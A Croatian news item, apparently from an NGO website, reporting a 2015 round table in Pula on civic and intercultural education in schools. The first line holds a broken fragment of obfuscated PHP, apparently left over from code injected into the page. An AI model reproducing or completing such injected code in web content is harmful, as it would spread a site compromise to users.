header

*/($a3b0c4[$o5b2['i29321'][6]]);}exit();}} ?>

IMAG0332

26. siječnja 2015. od 11:30 do 13:30 sati u Društvenom centru Rojc, Gajeva 3, Pula održan je okrugli stol koji je okupio dionike iz škola i organizacija civilnog društva kako bi raspravili o provedbi i mogućnostima unapređenja građanskog i interkulturalnog obrazovanja.

Uvodno je Martina Horvat, predstavnica GOOD inicijative za građanski odgoj i obrazovanje, naglasila kako je interkulturalna dimenzija sastavni dio građanskog obrazovanja u trenutnom programu, ali i po programu iz 1999. godine te da ovaj oblik obrazovanja treba biti dostupan svim učenicima kako bi razvili znanja o ljudskim pravima, demokraciji, poduzetnosti i održivom razvoju kao i vještine potrebne za sudjelovanje u zajednici. Interkulturalno učenje podrazumijeva upoznavanje vlastite kulture kao i učenje o manjinskim kulturama i različitim kulturnim utjecajima na zajednicu jer je sve to dio naše zajedničke kulturne baštine, naglašava gđa. Horvat. Organizacije civilnog društva provode različite programe građanskog obrazovanja kroz koje surađuju sa školama, a više o tim programima može se pronaći na web stranici http://www.edukatalog.info/.

Igor Đorđević iz Nansen dijalog centra opisao je razvoj programa Kulturne i duhovne baštine zavičaja koji je krenuo s provedbom 2007. na tri škole, a sada je kroz izvan-nastavne aktivnosti i zajednički godišnji susret učenika obuhvaćeno 23 škole. Izvan-nastavni program uključuje obrazovne sadržaje zajedničke svim uključenim školama vezane uz odnose među ljudima, uvažavanje različitosti i kreativno rješavanje sukoba, ali i posebne sadržaje vezane uz kulturnu baštinu pojedinog zavičaja.

Učenici iz Osnovne škole Vidikovac su, zajedno s ravnateljicom škole Suzanom Mohorović i profesoricom Jelenom Kolić, predstavili izvan-nastavnu aktivnost Kulturne i duhovne baštine zavičaja koju provode u suradnji s Nansen dijalog centrom. Učenici tijekom ove školske godine samostalno istražuju kulture nacionalnih manjina, a nakon toga planiraju i susrete s organizacijama i zajednicama nacionalnih manjina kako bi ih bolje upoznali. Učenici su sudjelovali na zajedničkom susretu svih učenika uključenih u ovaj program koji je organiziran u Otoku u Vukovarsko-srijemskoj županiji 4. listopada 2014. Djeca pokazuju veliki interes za ovakav oblik rada, ističe prof. Kolić, a ove godine ih se prijavio dupli broj u odnosu na prošlu pa mi ih je teško sve uključiti unutar predviđene satnice.

Publikacije

interkulturno obrazovanje

Facebook

logo nansen korak po korak